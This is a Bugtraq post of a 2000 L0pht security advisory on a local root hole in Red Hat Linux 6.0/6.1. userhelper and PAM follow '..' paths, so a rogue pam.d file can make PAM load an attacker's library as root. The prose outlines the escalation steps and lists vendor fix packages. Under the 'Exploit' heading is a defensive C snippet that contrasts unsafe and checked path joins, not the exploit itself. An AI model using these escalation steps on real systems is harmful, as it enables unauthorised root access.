From dildog@L0PHT.COM Mon Jan 10 15:34:37 2000
From: Dildog
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Tue, 4 Jan 2000 20:09:05 -0500
Subject: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper

L0pht Security Advisory

Advisory Name: PamSlam
Advisory Released: [01/04/00]
Application: userhelper and PAM on Redhat Linux 6.0/6.1
Severity: A local user can gain root access.
Status: Vendor contacted. Fix provided by vendor. Advisory released.
Author: dildog@l0pht.com
WWW: http://www.l0pht.com/advisories.html

Overview:

Both 'pam' and 'userhelper' (a setuid binary that comes with the 'usermode-1.15' rpm) follow .. paths. Since pam_start() calls down to _pam_add_handler(), we can get it to dlopen any file on disk. Because 'userhelper' is setuid, that gets us root.

Description:

Because both userhelper and PAM follow .. paths, we can craft a file that causes userhelper (by way of PAM) to dlopen any shared object we want as root. The exploit is simple and uses the '-w' option of userhelper, which lets us specify a program to run with the privileges designated by PAM. userhelper tries to execute only programs that have entries in /etc/security/console.apps, but since we get to specify the name, a name such as ../../../tmp/myprog gives a file-open path of /etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to keep a filename below a directory!

After this hurdle, PAM is called to start up the binary, and it does the same thing, looking for the file name in /etc/pam.d. If we have placed a rogue pam.d configuration file in /tmp/myprog, PAM can be pointed to /etc/pam.d/../../../tmp/myprog. In the pam.d configuration file we get to pick a few shared libraries to dlopen, so at this point we have root.
The following exploit demonstrates this vulnerability by creating a 'rootshell library' that spawns a shell when dlopened, creating a pam.d-style configuration file, and then running userhelper with the appropriately dotted path.

Quick solution:

Download the fix from RedHat at:

Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm

Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm

Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm

Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm

Red Hat Linux 6.0:

Intel:
ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm

Alpha:
ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm

Sparc:
ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm

Source packages:
ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm

Exploit:

Uudecode the following script. Run the script.
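The root cause the advisory points at is the strcat-style path join in both the console.apps lookup and the pam.d lookup. The following is an added illustration, not code from the advisory, userhelper or Linux-PAM: the naive join is shown next to a checked join that requires the service name to be a single path component. The directory names and the character-set policy in checked_join() are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>

/* Naive join in the style the advisory criticises: the caller-supplied
 * service name is appended with strcat, so ".." components walk out of
 * the directory. Kept only to contrast with checked_join() below. */
int naive_join(const char *dir, const char *name, char *out, size_t outlen) {
    if (strlen(dir) + strlen(name) + 1 > outlen)
        return -1;
    strcpy(out, dir);
    strcat(out, name);
    return 0;
}

/* Checked join: a service name must be exactly one path component.
 * Reject empty names, any '/', the special names "." and "..", and
 * anything outside a conservative character set (assumed policy).
 * Returns 0 and fills 'out' on success, -1 otherwise. */
int checked_join(const char *dir, const char *name, char *out, size_t outlen) {
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return -1;
    for (const char *p = name; *p; p++) {
        int ok = (*p >= 'a' && *p <= 'z') || (*p >= 'A' && *p <= 'Z') ||
                 (*p >= '0' && *p <= '9') || *p == '-' || *p == '_' || *p == '.';
        if (!ok)
            return -1;
    }
    int n = snprintf(out, outlen, "%s%s", dir, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void) {
    /* Constructed sample names: a legitimate service name and the dotted
     * name shape the advisory describes. */
    const char *names[] = { "halt", "../../../tmp/myprog", ".." };
    const char *dirs[] = { "/etc/security/console.apps/", "/etc/pam.d/" };
    char buf[256];
    for (size_t d = 0; d < 2; d++) {
        for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
            int nv = naive_join(dirs[d], names[i], buf, sizeof buf);
            printf("naive   %-22s -> %s\n", names[i], nv == 0 ? buf : "(too long)");
            int cv = checked_join(dirs[d], names[i], buf, sizeof buf);
            printf("checked %-22s -> %s\n", names[i], cv == 0 ? buf : "(rejected)");
        }
    }
    return 0;
}
```

The same single-component check covers both lookups the advisory describes, since the pam.d service name and the console.apps program name are meant to be bare file names, never paths.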